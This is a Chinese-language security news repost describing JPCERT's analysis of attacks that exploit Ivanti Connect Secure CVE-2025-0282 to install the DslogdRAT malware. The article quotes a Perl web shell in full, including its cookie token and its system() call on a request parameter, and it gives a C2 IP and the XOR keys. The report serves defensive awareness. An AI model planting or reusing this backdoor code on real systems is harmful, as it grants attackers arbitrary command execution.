网易首页 > 网易号 > 正文 申请入驻

【安全圈】零日漏洞引发危机:黑客利用 Ivanti VPN 发动 DslogdRAT 恶意攻击

0
分享至

关键词

零日漏洞

近期针对日本组织的攻击事件表明,有技术高超的黑客利用了 Ivanti Connect Secure VPN 设备中的一个零日漏洞。

攻击者利用 CVE-2025-0282 漏洞部署了多种恶意工具,其中包括一种名为 DslogdRAT 的定制恶意软件以及一个精心制作的网页后门。

这些工具使攻击者能够持续访问被攻陷的系统,并远程执行任意命令。

威胁行为者通过将零日漏洞利用与定制恶意软件部署技术相结合,展示出了高超的攻击能力。

在攻陷 VPN 设备后,攻击者安装了一个基于 Perl 语言的网页后门,以此作为初始立足点,进而能够部署包括 DslogdRAT 在内的更多恶意软件组件。

这种多阶段的攻击方式显示出攻击者在针对安全网络基础设施时经过了有条不紊的策划,且具备较高的技术水平。

JPCERT 的分析师发现,DslogdRAT 恶意软件设计有特定的逃避检测功能,特别是它仅在上午 8 点到晚上 8 点的工作时间内运行。

这种经过精心算计的攻击方式帮助攻击者将恶意流量与合法的业务操作相融合,在保持对被攻陷环境持续访问的同时,大幅降低了被检测到的可能性。

除了 DslogdRAT,研究人员还在同样被攻陷的系统中发现了另一种名为 SPAWNSNARE 的恶意软件变种,这表明这是一次经过协同且资源充足的攻击行动。

Google 和 CISA 此前在 2025 年 4 月都曾报告过类似的攻击活动,这表明针对 Ivanti 产品的攻击仍在持续。

安全专家警告称,这些攻击代表着一种持续存在的威胁,Ivanti Connect Secure 产品依然是高价值的攻击目标。

该供应商最近已修复了另一个严重漏洞(CVE-2025-22457),但相关组织仍被敦促保持警惕,因为预计攻击还会继续。

DslogdRAT 的技术分析

DslogdRAT 采用了一种复杂的执行流程,旨在逃避检测机制。在执行时,该恶意软件的主进程会在立即终止自身之前创建一个子进程。

随后,第一个子进程会对经过异或(XOR)加密的配置数据进行解码(使用 0x63 作为密钥),并生成包含核心功能的第二个子进程。

这种进程隔离技术有助于绕过那些监控单进程行为,或者在父进程结束时就会终止检测的安全解决方案。

攻击者最初是通过部署在 “/home/webserver/htdocs/dana-na/cc/ccupdate.cgi” 的一个看似简单但却有效的基于 Perl 语言的网页后门获得访问权限的。

这个 Web Shell 代码揭示了攻击者是如何建立初始立足点的:

use CGI; my $cookie_str = $ENV{HTTP_COOKIE};

if($cookie_str =~ /DSAUTOKEN=([^;]+)/) {

if($1 eq ‘af95380019083db5’) {

print CGI:: header( -type => ‘text/html’ );

my $data = CGI::param(‘data’);

system($data);

exit(0);

这段代码允许攻击者只需发送带有特定 cookie 值 “DSAUTOKEN=af95380019083db5” 的 HTTP 请求,并在 “data” 参数中包含要运行的命令,就可以执行任意命令。

这个后门的简单性凸显了这样一个事实:即使是简单的代码,在被部署到关键基础设施中时,也可能造成严重的安全漏洞。

DslogdRAT 与其命令控制服务器(3.112.192.119:443)之间的通信使用了一种定制的编码机制。

所交换的数据会使用一种简单的异或操作进行混淆处理,该操作会以 7 字节为一块,按照轮换模式应用从 0x01 到 0x07 的密钥。

这种技术虽然不是非常复杂,但足以提供足够的混淆效果,以避免基本的网络流量分析,同时支持包括文件传输、Shell 命令执行和代理功能在内的多种命令功能。

安全圈

网罗圈内热点 专注网络安全

实时资讯一手掌握!

好看你就分享 有用就点个赞

支持「安全圈」就点个三连吧!

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
特朗普宣称“不需要国际法”,联合国秘书长重申立场

特朗普宣称“不需要国际法”,联合国秘书长重申立场

澎湃新闻
2026-01-10 19:57:04
美国海岸警卫队登上“奥利娜”油轮

美国海岸警卫队登上“奥利娜”油轮

界面新闻
2026-01-09 21:42:11
穷追猛打!清华花心博士后婚内出轨,丢了工作奔赴新事业再被举报

穷追猛打!清华花心博士后婚内出轨,丢了工作奔赴新事业再被举报

火山诗话
2026-01-10 15:48:11
伊朗,进入倒计时

伊朗,进入倒计时

难得君
2026-01-10 08:24:21
热搜第一!义乌“哭哭马”供不应求,工人手滑缝反嘴巴意外爆红,网友:马倒成功了

热搜第一!义乌“哭哭马”供不应求,工人手滑缝反嘴巴意外爆红,网友:马倒成功了

大风新闻
2026-01-10 16:09:20
国乒面临全军覆没!王曼昱也输了,对手发声引发担忧,马琳开门黑

国乒面临全军覆没!王曼昱也输了,对手发声引发担忧,马琳开门黑

三十年莱斯特城球迷
2026-01-10 20:56:18
旧金山飞北京首都机场一航班降落前突然复飞,备降至大兴机场,美联航客服:天气原因导致

旧金山飞北京首都机场一航班降落前突然复飞,备降至大兴机场,美联航客服:天气原因导致

极目新闻
2026-01-10 15:13:10
曝霍启刚主动公布个人财产:35项物业曝光,放租28房成全球包租公

曝霍启刚主动公布个人财产:35项物业曝光,放租28房成全球包租公

开开森森
2026-01-10 14:42:12
无锡籍女演员去世 遗作今晚播出

无锡籍女演员去世 遗作今晚播出

无锡eTV全媒体
2026-01-10 19:48:00
京东航空第11架波音737货机投用

京东航空第11架波音737货机投用

IT之家
2026-01-10 15:10:24
韩国某中学把“中华人民共和国”当作班级目标引争议

韩国某中学把“中华人民共和国”当作班级目标引争议

随波荡漾的漂流瓶
2026-01-10 17:50:06
中国有源相控阵雷达真实水平:并非世界第一,和美差距有多大

中国有源相控阵雷达真实水平:并非世界第一,和美差距有多大

黑翼天使
2026-01-10 03:28:16
2-1绝杀!3-2逆转!U23亚洲杯一夜乱了:越南6分未出线,沙特翻车

2-1绝杀!3-2逆转!U23亚洲杯一夜乱了:越南6分未出线,沙特翻车

侃球熊弟
2026-01-10 07:58:57
“我不需要国际法”:特朗普的“霸权菜单”越拉越长,墨西哥成新目标

“我不需要国际法”:特朗普的“霸权菜单”越拉越长,墨西哥成新目标

上游新闻
2026-01-10 18:36:25
碎三观!网传有漂亮女生主动给豪车车主发短信,自报家门要加好友

碎三观!网传有漂亮女生主动给豪车车主发短信,自报家门要加好友

火山诗话
2026-01-10 16:48:11
回顾许家印被抓捕现场,奋力反抗,怒吼不已,被抓捕人员抬出去

回顾许家印被抓捕现场,奋力反抗,怒吼不已,被抓捕人员抬出去

干史人
2026-01-08 22:47:00
一夜暴涨!又被金价惊到了!

一夜暴涨!又被金价惊到了!

江南晚报
2026-01-09 21:22:25
女演员发文:好聚好散

女演员发文:好聚好散

扬子晚报
2026-01-10 15:12:27
据说:市面上90%的烤鸭都是用这种做的?你还吃吗?

据说:市面上90%的烤鸭都是用这种做的?你还吃吗?

今朝牛马
2026-01-08 18:32:41
北海道五岁男孩被卷进中国产扶手梯身亡?厂家惊呼“我们当时压根没卖给日本啊!”

北海道五岁男孩被卷进中国产扶手梯身亡?厂家惊呼“我们当时压根没卖给日本啊!”

日本通
2026-01-09 10:33:55
2026-01-10 21:59:00
安全圈
安全圈
国内首家大安全概念新媒体
6319文章数 4689关注度
往期回顾 全部

科技要闻

传DeepSeek准备第二次震惊全世界

头条要闻

男子精神分裂砍死同学的弟弟 第二次精神鉴定结果变了

头条要闻

男子精神分裂砍死同学的弟弟 第二次精神鉴定结果变了

体育要闻

怒摔水瓶!杜兰特30+12 难阻火箭遭双杀

娱乐要闻

吴速玲曝儿子Joe是恋爱脑

财经要闻

这不算诈骗吗?水滴保诱导扣款惹众怒

汽车要闻

宝马25年全球销量246.3万台 中国仍是第一大市场

态度原创

家居
教育
数码
艺术
手机

家居要闻

木色留白 演绎现代自由

教育要闻

王德峰教授谈儿子的教育问题:我认了!

数码要闻

雷神MIX GAMING 2迷你主机,竟能实现4K 120帧游戏体验

艺术要闻

王耀中油画作品集

手机要闻

realme真我Neo8参数曝光:骁龙8 Gen5处理器、8000mAh电池

无障碍浏览 进入关怀版